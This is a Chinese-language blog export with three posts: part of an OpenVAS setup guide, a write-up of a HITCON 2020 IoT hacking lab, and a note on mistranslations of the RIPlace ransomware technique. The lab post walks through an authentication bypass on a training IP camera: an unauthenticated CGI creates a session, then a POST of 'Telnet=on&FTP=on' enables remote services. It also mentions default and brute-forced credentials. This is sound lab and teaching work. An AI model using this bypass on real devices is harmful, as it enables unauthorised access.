<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMuuNz8cmGxwf128JgLC9ISYyeg5PSUNZSav51M2L7coHIRHBZUg-vmEyyUOQRjigPjWNA47b6e-QjaRKzn5DkcW5kE309AHWDblin0jgiP8EeIJnPN3i90GyKQ-R9dZaIaWiXmeePS-KD/s851/openvas-07.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="632" data-original-width="851" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMuuNz8cmGxwf128JgLC9ISYyeg5PSUNZSav51M2L7coHIRHBZUg-vmEyyUOQRjigPjWNA47b6e-QjaRKzn5DkcW5kE309AHWDblin0jgiP8EeIJnPN3i90GyKQ-R9dZaIaWiXmeePS-KD/s400/openvas-07.PNG" width="400" /></a></div></div></li><li>存檔後,重新啟動虛擬機</li><li>重新進入虛擬機後,請執行「<span style="color: white;">sudo gvm-start</span>」啟動服務</li><li>利用外部電腦的瀏覽器連線,終於連上了,但是~~~帳號和密碼呢?
<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFyHuc0che474dfNy9q_n2re0BE6Lf4fvgA0qvAMH72cSmpj_vQokRncEqz3OqOWpfLEXAtVtPhFDGuVinSD86qi7ylTqcRochG2JXylTGxgGOJCC0y0W983_dZYSWIojQx9FBezMRfz8D/s946/openvas-09.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="621" data-original-width="946" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFyHuc0che474dfNy9q_n2re0BE6Lf4fvgA0qvAMH72cSmpj_vQokRncEqz3OqOWpfLEXAtVtPhFDGuVinSD86qi7ylTqcRochG2JXylTGxgGOJCC0y0W983_dZYSWIojQx9FBezMRfz8D/s400/openvas-09.PNG" width="400" /></a></div></div>
</li></ol>
</div>
<p><span style="color: #274e13; font-size: large;"><b>四、帳號和密碼呢?</b></span></p>
<p style="margin-left: 2em;">在安裝過程中都沒有注意到OpenVAS的帳密,這下怎麼辦?別急,再回到OpenVAS伺服器,使用下列命令重設「admin」的密碼<br />
<span style="background-color: black; color: #ffa400; padding: 4px 2em;">sudo runuser -u _gvm -- gvmd --user=admin --new-password=toor <br /></span></p>
<p style="margin-left: 2em;">如果要增加其他使用者,可以執行下列命令:<br />
<span style="background-color: black; color: #ffa400; padding: 4px 2em;">sudo runuser -u _gvm -- gvmd --create-user=<span style="color: #04ff00;"><新帳號></span> --password=<span style="color: #04ff00;"><設定密碼></span></span></p>
<p><span style="color: #990000; font-size: large;"><b>重新使用「admin / toor」登入OpenVAS,成功!</b></span></p>
<hr style="color: #29fb08; height: 2px;" />
<p><span style="color: #274e13; font-size: large;"><b>備註:</b></span></p>
<p>若啟動 redis-server 時,若出現「<span style="color: red;">redis-server is not running or not listening on
socket: /var/run/redis-openvas/redis-server.sock</span>」的錯誤訊息,處理方式如下:</p>
<div style="background-color: black; color: #fbcf08;">
<ol><li>sudo nano /etc/redis/redis.conf <span style="color: #04ff00;"> #編輯 redis.conf</span><br /></li>
<li>搜尋「<span style="color: white;"><b>unixsocket</b></span>」文字,應該會找到下列兩列文字:<br />
# unixsocket /var/run/redis/redis.sock <br />
# unixsocketperm 700
</li>
<li>只要將註解符號刪除,然後存檔,再重新啟動OpenVAS伺服器即可
<div style="border: 2px solid white; padding: 4px;"><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga5-KbQxj73kjFooRe1GtbT8Mjio6KSEG6yWhvDrYDLq8WfrLPBfZLeR5Ww3PSmaOET8ZN6GKy8LfIyIWE1dNGaPz0-jyTjZmMdidMKqPQMj1b1DpsCdqtigaomMQiBQz-qP-Ju5Lf7OsC/s803/openvas-10.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="622" data-original-width="803" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga5-KbQxj73kjFooRe1GtbT8Mjio6KSEG6yWhvDrYDLq8WfrLPBfZLeR5Ww3PSmaOET8ZN6GKy8LfIyIWE1dNGaPz0-jyTjZmMdidMKqPQMj1b1DpsCdqtigaomMQiBQz-qP-Ju5Lf7OsC/s400/openvas-10.PNG" width="400" /></a></div></div>
</li>
</ol>
</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com24tag:blogger.com,1999:blog-1967825056283652287.post-13841944829706754082020-11-07T12:19:00.003+08:002020-11-07T12:22:05.517+08:00HITCON 2020 { IoT Hacking 101 }議程之 LV2題目的另類解法<div style="border: 4px solid rgb(0, 0, 204); font-size: 12pt; line-height: 200%; padding: 8px;">
<p style="line-height: 150%; text-indent: 2em; word-spacing: 2px;">今年的Hitcon
2020第一天<b>Jimmy Liu</b>老師主講「<b><span style="color: #cc0000;">IoT Hacking
101</span></b>」,主要是實作基礎的物聯網設備滲透測試!有關上課素材可從「<a href="https://github.com/DrmnSamoLiu/Hitcon-iot101">https://github.com/DrmnSamoLiu/Hitcon-iot101</a>」下載,上課簡報請參考素材包裡的DVIPcam_hitcon.pdf,在此假設您已事先閱讀並瞭此份簡報的內容。</p>
<p>參加此議題的同事於會後分享學習心得,而筆者事後練習時,又發現LV2(簡報22頁)有另一條啟用Telnet及FTP服務的途徑,借此做個筆記。</p>
<p style="line-height: 150%; text-indent: 2em; word-spacing: 2px;">此題的網路攝影機預設只開啟端口443、554、8000,我們要想辦法辦啟動這台設備上的Telnet及FTP服務,即開啟端口23及21。<br /></p><p style="line-height: 150%; text-indent: 2em; word-spacing: 2px;">依照簡報內容,由於使用者未變更預設密碼,駭客可由使用手冊得知兩組登入帳密:「<b><span style="color: #20124d;">root</span></b> /
<b><span style="color: #b45f06;">root</span></b>」及「<b><span style="color: #20124d;">user</span></b> / <b><span style="color: #b45f06;">DVIPcam</span></b>」,實際上,root的密碼已變更,無法直接以管理員身分登入管理界面,但<span style="color: #990000;">user的密碼則未變更</span>,駭客能夠<b>經由提權而取得管理員權限</b>,在瀏覽「System
Configuration」頁面時啟用Telnet及FTP服務(簡報28頁)。好了,前述的滲透手法,簡報裡已寫得很清楚,這裡不再贅述。</p>
<p>但~~<span style="color: #cc0000;">如果連user的預設密碼也被修改,</span>有沒有「<span style="color: #351c75;"><b>不需要網站的帳密就能開啟Telnet服務</b></span>」的方法?這篇的手法就是了!</p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
一、為了分析網站的原始碼,先從登入頁下載此設備的韌體更新檔(firmware.bin)。</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR8VyN4iO2QJreJII5NfNkRro_JAMJY6yshM8fosMcFw0kUOG9XOwECGbifOondAtD6rKAKAWp-ntWy9MbbWnlpeL9ZNRftWJ4x-v9werWudOMStUno4siZG7m-fY6Q_VM1CsnL7e_kd89/s748/LV2-01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="748" data-original-width="423" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR8VyN4iO2QJreJII5NfNkRro_JAMJY6yshM8fosMcFw0kUOG9XOwECGbifOondAtD6rKAKAWp-ntWy9MbbWnlpeL9ZNRftWJ4x-v9werWudOMStUno4siZG7m-fY6Q_VM1CsnL7e_kd89/w226-h400/LV2-01.png" width="226" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
二、利用<span style="color: #cc0000;"><b>7-zip</b></span>開啟 firmware.bin,檢查 <b>www/cgi-bin/ </b>目錄,注意<span style="color: #cc0000;"><b>readcookie.cgi</b></span>、<span style="color: #cc0000;"><b>Config.cgi</b></span>及<span style="color: #cc0000;"><b>Configsubmit.cgi</b></span>這三個檔案。</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1LBWqjiTf9jAglZgj6BV4T9T1ZIVWpreZXP_Y8ct9R1-xynYim5QhomSiFvv9K2hdPmMJSNDSY_lrMGSO0ny06FpdFa_ZHf4MGpaDTfDLNW3CWCvZ81TVaRfWJFuGxQDZmf79k4VWzsW/s593/LV2-02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="269" data-original-width="593" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie1LBWqjiTf9jAglZgj6BV4T9T1ZIVWpreZXP_Y8ct9R1-xynYim5QhomSiFvv9K2hdPmMJSNDSY_lrMGSO0ny06FpdFa_ZHf4MGpaDTfDLNW3CWCvZ81TVaRfWJFuGxQDZmf79k4VWzsW/w400-h181/LV2-02.png" width="400" /></a></div><p></p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">三、檢查readcookie.cgi,發現呼叫此CGI時<span style="color: #cc0000;">不會檢查是否已登入</span>,且會將HTTP_COOKIE寫到/var/Allowed_SessionID,而<b>Allowed_SessionID</b>是判斷使用者有沒有登入的依據。我們就是利用此漏洞。</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqjYwgLdMuKtgItqYc7uPWyWLGyZQl1H5ZsPHbOd5F7ZcyegYc9xvCdWsFMJGEkrxHh9MIBYnhm0DoxQLP20haizrUopD9LuuGIEphzWTkNWOMFdpWGELyFgmGro0V5cxqFMT3Q85ZeXzt/s857/LV2-03.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="436" data-original-width="857" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqjYwgLdMuKtgItqYc7uPWyWLGyZQl1H5ZsPHbOd5F7ZcyegYc9xvCdWsFMJGEkrxHh9MIBYnhm0DoxQLP20haizrUopD9LuuGIEphzWTkNWOMFdpWGELyFgmGro0V5cxqFMT3Q85ZeXzt/w400-h204/LV2-03.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"> 四、檢視Config.cgi,發現它會載入 <span style="color: #990000;"><b>/var/web/Config.html</b></span>,所以再檢視此網頁,發現它是用來設定FTP及Telnet開關,Submit的內容是<span style="color: #cc0000;"><b>Telnet=on/off&FTP=on/off</b></span>,提交對象是「<span style="color: #cc0000;"><b>/cgi-bin/Configsubmit.cgi</b></span>」</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFLB48tUQTWMxZMOYuRogB2jW6k7-Lw2meObOH6MrhOioU_GB2BrEuBVQGonEkcnDG8W7I69NAeXAAaU8-Qvo4fMec6agmOLaDnDXEVZcgP9SkFdZ_S5ajvXKlk3dFrCFJ0H_Hgldu4KU_/s1015/LV2-04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="785" data-original-width="1015" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFLB48tUQTWMxZMOYuRogB2jW6k7-Lw2meObOH6MrhOioU_GB2BrEuBVQGonEkcnDG8W7I69NAeXAAaU8-Qvo4fMec6agmOLaDnDXEVZcgP9SkFdZ_S5ajvXKlk3dFrCFJ0H_Hgldu4KU_/w400-h309/LV2-04.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"> 五、再檢視「Configsubmit.cgi」,發現此cgi並不會檢查權限,只要有session就可以成立。(剛剛的readcookie.cgi已可建立session)</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_LaSHEQ7K7aT2_TW7cXowVEKmt45BAMJoCjfkBWp7wMe88s0qaAtiFP1_NidZnND3A-9ZXMXPNkbpm1gV-lRPBPMB9t7bDQvIEasXFnmELG7j6KcakPJtqt4oC3Y6A9TcYH2Yp5Z1bAb/s983/LV2-05.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="878" data-original-width="983" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx_LaSHEQ7K7aT2_TW7cXowVEKmt45BAMJoCjfkBWp7wMe88s0qaAtiFP1_NidZnND3A-9ZXMXPNkbpm1gV-lRPBPMB9t7bDQvIEasXFnmELG7j6KcakPJtqt4oC3Y6A9TcYH2Yp5Z1bAb/w400-h358/LV2-05.png" width="400" /></a></div><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"> <br /></p>
<p><span style="font-size: 1.2em;"><b>經由上面分析</b></span>,得知<span style="color: #cc0000;">readcookie.cgi可以建立空seeeionid</span>,<span style="color: #cc0000;">Configsubmit.cgi可以設定Telnet及FTP服務</span>,為了便於操作,此處使用Firefox示範。(<b><span style="color: #38761d;"><i><span style="background-color: #fce5cd;">192.168.232.139</span> 是筆者電腦啟動LV2映象檔後的網址,請依個人環境修正</i></span></b>)<br /></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
一、 在瀏覽 https://<i>192.168.232.139</i>/<b>cig-bin/readcookie.cgi</b>,會得到如下結果,<span style="color: #cc0000;"><b>重點在於session is
的內容是空的</b></span>。</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSkzlaaFqD2XYeOtxDgZZuuAtAFp_ef1Gb9BgR24cdVxqzZltY1puRtRV2KzDSz-9Tq5S1VFeDbt_3lclWgNaiEUyrw3771YLynN0lO0hSVRrCXxq4FTi73RyN_HXZMtUZmaEZOQ4kAV1z/s724/LV2-06.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="724" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSkzlaaFqD2XYeOtxDgZZuuAtAFp_ef1Gb9BgR24cdVxqzZltY1puRtRV2KzDSz-9Tq5S1VFeDbt_3lclWgNaiEUyrw3771YLynN0lO0hSVRrCXxq4FTi73RyN_HXZMtUZmaEZOQ4kAV1z/w400-h111/LV2-06.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
二、啟用 FireFox的<b>開發者模式</b>,切換到「<b>網路</b>」頁籤。</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
三、瀏覽https://<i>192.168.232.139</i>/<b>cig-bin/Configsubmit.cgi</b>,出現404是正常的。 <br /></p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUG9p2hL4oclnWpJwpfZAmRakCikXfp0JOgNeXa6Vy7HUQhqX_Ud3wzH9Xt-2CnqSNz4_8VjKfFX5BhV8bHUwO7UIJz0wHHalB6-tuauIn3b4GBqCurxP92wvFiW5CFvBeAYcmPiHZ3vJ/s1181/LV2-07.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="704" data-original-width="1181" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqUG9p2hL4oclnWpJwpfZAmRakCikXfp0JOgNeXa6Vy7HUQhqX_Ud3wzH9Xt-2CnqSNz4_8VjKfFX5BhV8bHUwO7UIJz0wHHalB6-tuauIn3b4GBqCurxP92wvFiW5CFvBeAYcmPiHZ3vJ/w400-h239/LV2-07.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">四、從「網路」頁籤的網址清單中選擇剛剛請求的Configsubmit.cgi,然後點擊右方的「<b>重新發送</b>」下拉選單,並選擇「<b>編輯並重新發送</b>」項目。</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKknQrff9f-aS5iC-GaSAjoEPUENsSN30yiOiED39tsWVQ23nq_cs5xcGbIBvzTkPepb-vtbauNBMtjomuOs-OsRSEz74y3folxVD6wq62UJSkxOs5geajJYbH0VDJp0kPQkC2sRHozwU/s1181/LV2-07.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="704" data-original-width="1181" height="239" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwKknQrff9f-aS5iC-GaSAjoEPUENsSN30yiOiED39tsWVQ23nq_cs5xcGbIBvzTkPepb-vtbauNBMtjomuOs-OsRSEz74y3folxVD6wq62UJSkxOs5geajJYbH0VDJp0kPQkC2sRHozwU/w400-h239/LV2-07.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">五、將方法改成「POST」,並在請求內容中貼上「Telnet=on&FTP=on」,然後「傳送」。</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPbG_lTDv7ZswWy2Xm7vniwLxlOsuRoIa2Xj7FpRbJoAgANnqAcn46bEoAnvt6sz9lgo6mWuAZBgDEVEvzuzX8YKY7MGRDrYGufCrRaxOgjwr0Heg4JqdjQwq_d_Gub31-4YLifY-faIuj/s1181/LV2-08.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="1181" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPbG_lTDv7ZswWy2Xm7vniwLxlOsuRoIa2Xj7FpRbJoAgANnqAcn46bEoAnvt6sz9lgo6mWuAZBgDEVEvzuzX8YKY7MGRDrYGufCrRaxOgjwr0Heg4JqdjQwq_d_Gub31-4YLifY-faIuj/w400-h223/LV2-08.png" width="400" /></a></div><p></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p>
<p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;">
六、查看回應結果,FTP及Telnet已經打開。</p><p style="margin-bottom: 6px; margin-left: 3em; margin-right: 2em; margin-top: 0; margin: 0px 2em 6px 3em; text-indent: -2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie2M9gEsJOf62D_Tj_bYVCE6i5OMZjWg5mZ1pC_9A0QWfbf-VOthR12qBinAK9yUeX2EcaRLBNRgZjI5VrEDohC8IHJ3gLgTucnsMXAulY5LuLdagLLXhoHXxxQ25fmPyJoi_lawBZREuj/s906/LV2-09.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="494" data-original-width="906" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie2M9gEsJOf62D_Tj_bYVCE6i5OMZjWg5mZ1pC_9A0QWfbf-VOthR12qBinAK9yUeX2EcaRLBNRgZjI5VrEDohC8IHJ3gLgTucnsMXAulY5LuLdagLLXhoHXxxQ25fmPyJoi_lawBZREuj/w400-h217/LV2-09.png" width="400" /></a></div><p></p>
<p>假設您已按照簡報30頁的方法執行暴力破解,應該已得到作業系統的 <span style="color: #351c75;"><b>admin</b></span> / <b><span style="color: #b45f06;">Administrator</span></b> 這組帳密,可以利用telnet操控這台設備了!</p>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-60401200163565538422020-07-21T20:36:00.000+08:002020-07-21T20:36:38.113+08:00天下文章一大抄,你錯我錯一起叫!<div style="border: #0000cc 4px solid; font-size: 12pt; line-height: 200%; padding: 8px;">
<div style="margin: 0.5em 0; text-indent: 2em;">
個人習慣將資料做三個複本,每月另備到庫存硬碟,因此不太在意勒索病毒。恰好前些日子機關舉辦資安意識講座,講師提到最近有一支勒索病毒利用作業系統的漏洞,可以避過防毒軟體的查殺,病毒使用的技術叫「RIPlace」。這個技術引起我的興趣,上網搜尋發現有大量文章報導這支病毒,基於公務員的潛意識,首先瀏覽技服中心的<b><a href="https://www.nccst.nat.gov.tw/NewsRSSDetail?lang=zh&RSSType=news&seq=16407" target="_blank">資安新聞</a></b>,結果~~是我國學有問題?還是眼睛業障重?我真的看不懂這段中文字「<b><span style="color: #660000;">(3)將原始檔案存入硬碟,透過Rename功能置換原始檔案</span></b>」,原始檔案不就在硬碟中,幹嘛還要「將原始檔案存入硬碟」?然後還「透過Rename功能置換原始檔案」,自己換掉自己,又是什麼道理?
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://webcache.googleusercontent.com/search?q=cache:eebZE5JeYM8J:https://www.nccst.nat.gov.tw/NewsRSSDetail%3Flang%3Dzh%26RSSType%3Dnews%26seq%3D16407+&cd=4&hl=zh-TW&ct=clnk&gl=tw&client=firefox-b-d" target="_blank"><img alt="技服的頁庫存檔" border="0" data-original-height="1001" data-original-width="1289" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1sbeLLMI3AneYdktg9NEI9QBuIJoRFB_ZV-viq53BqV_lCbH1t9MObn1k-UvIIR6SlB2tnW-bwyQhpqmmVj70n18Io1Tn7hi75ufFCIG07ncNbKIU-yBZHxabeGEZSEVcEAaorjvaZbDm/s400/%25E6%258A%2580%25E6%259C%258D-00.JPG" width="400" /></a></div>
<div style="margin: 0.5em 0; text-indent: 2em;">
還好文章底下有英文參考來源, 連到<a href="https://www.nyotron.com/blog/nyotron-discovers-potentially-unstoppable-ransomware-evasion-technique-riplace/">www.nyotron.com</a>看看(這個漏洞是它找到的),原文是「3.OR saving encrypted file to disk, then replacing it with the original file using the Rename operation.」:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.nyotron.com/blog/nyotron-discovers-potentially-unstoppable-ransomware-evasion-technique-riplace/" target="_blank"><img alt="nyotron" border="0" data-original-height="953" data-original-width="1277" height="297" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpedVgN-WN2h6ZtDU_HrGj22SPOPNJ1kBF_qeREMqDvy4zL3c9YG33P2HSJPZs80hXyG0_e9noW8hsH1l0hBdaBoM3qOAiFd_58Ir42SUnnOM1P_MfMhqaSChi0W1tfQo4TzAXOq6TQQNj/s400/norton.JPG" width="400" /></a></div>
<div style="margin: 0.5em 0; text-indent: 2em;">
用Google翻譯這段英文的結果:「<span style="color: #660000;"><b>將加密的文件保存到磁盤,然後使用重命名操作將其替換為原始文件</b></span>」,這中文的前段是對了,後段還是怪怪的,「使用重新命名的方式將它換成原始檔案」,這樣加密後的內容不就又回到原來的樣子,是要勒索誰呀!<br />
因此我推斷應該是作業系統有個漏洞,將<span style="color: purple;"><b>加密檔案</b></span>的名稱換成<b><span style="color: #274e13;">原始檔案</span></b>的名稱時(是替換檔名,不是替換檔案),作業系統不會檢查兩支檔案使用相同名稱,因此<span style="color: purple;"><b>加密檔案</b></span>存活下來,而<span style="color: #274e13;"><b>原始檔案</b></span>變成無主野鬼。至於<span style="color: #274e13;"><b>原始檔案</b></span>的內容是繼續留在原位置,還是<span style="color: purple;"><b>加密檔案</b></span>會因更名成功而覆蓋<span style="color: #274e13;"><b>原始檔案</b></span>本來的位置,我就不確定了!</div>
<div style="margin: 0.5em 0; text-indent: 2em;">
後來又找到另一個<a href="https://www.bleepingcomputer.com/news/security/new-riplace-bypass-evades-windows-10-av-ransomware-protection/">英文網站</a>,不僅提供更詳細的介紹,還畫出流程圖, 有關RIPlace的介紹,它就提到「Writing the encrypted data from memory to new file and then using the Rename call to replace the original file.」(將加密的數據從內存寫入新文件,然後使用“重命名”調用替換原始文件),這樣看起來就合理多了!</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.bleepingcomputer.com/news/security/new-riplace-bypass-evades-windows-10-av-ransomware-protection/" target="_blank"><img alt="bleepingcomputer" border="0" data-original-height="1023" data-original-width="1323" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMJoXUILLaDDjoHC_1Ay8dH-jvQDfg_SfOrip_dVUCENHqxcfcNxBLDdQqogcEcj9pXy5Ty91cVH44pQ3heYD3atyal7uLi5kWkGVJ6mB_kPn58LIoNtzXF8FbAFhg9RCPXYBwxqWExmuI/s400/bleeping-ok.JPG" width="400" /></a></div>
<div style="margin: 0.5em 0; text-indent: 2em;">
<br />
<span style="font-size: large;"><span style="color: #990000;"><b>7月21日再上技服網站,這篇新聞已經修正了。
</b></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.nccst.nat.gov.tw/NewsRSSDetail?lang=zh&RSSType=news&seq=16407" target="_blank"><img alt="技服資安新聞" border="0" data-original-height="1000" data-original-width="1264" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg38D6DugtYlgxzSMgCqsISPkrhGEwsvrCAc3-AU_4S8rpI2C6VwFxdLyYDMlJPFxDicLqL7VcL4iz0Fe6240MW3RmQHxxFHYDV3DHNr7ldMhxam7cL_GXQhT88TLTRk454E-dxgIWpimc-/s400/%25E6%258A%2580%25E6%259C%258D-01.JPG" width="400" /></a></div>
<br />
<div style="margin: 0.5em 0; text-indent: 2em;">
在發現技服的資安新聞有疑問後,繼續查詢其他資安網站的內容,真的「天下文章一大抄」大家都錯一樣。詳如後面的截圖。本篇沒有特別用意,只想傳達「<span style="color: #660000;"><b>盡信書不如無書</b></span>」,只要覺得不合常理,就該大力懷疑!</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O41rzCSFYBzRq2kyU_5eVh-WnbAoaZcjtekTDmHvfn8HeTZezGH4fDqzVMQa6rV_YfOnEpvJJnIddq12lJsAyQ_QzQq1tXXvcxoeqXYxxmwTph6dVLPhO0BjXaXQf7fr_wKxIB4OmA7I/s1600/insoler-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1026" data-original-width="1314" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6O41rzCSFYBzRq2kyU_5eVh-WnbAoaZcjtekTDmHvfn8HeTZezGH4fDqzVMQa6rV_YfOnEpvJJnIddq12lJsAyQ_QzQq1tXXvcxoeqXYxxmwTph6dVLPhO0BjXaXQf7fr_wKxIB4OmA7I/s400/insoler-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggPjbHqOJMbB68llCI9qZb0_O2T0bwJdk05Bo_9DPv3lRaWLUYiqihLpj7RpLR2P9r6bop0mNFqDeqA6tg50zPfF7ZZbUSgEY47etIeW8OF8sW55T58qtB9Y-d7BrmcCpOfWO6bKxWNs4w/s1600/isda-01.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="974" data-original-width="1430" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggPjbHqOJMbB68llCI9qZb0_O2T0bwJdk05Bo_9DPv3lRaWLUYiqihLpj7RpLR2P9r6bop0mNFqDeqA6tg50zPfF7ZZbUSgEY47etIeW8OF8sW55T58qtB9Y-d7BrmcCpOfWO6bKxWNs4w/s400/isda-01.JPG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
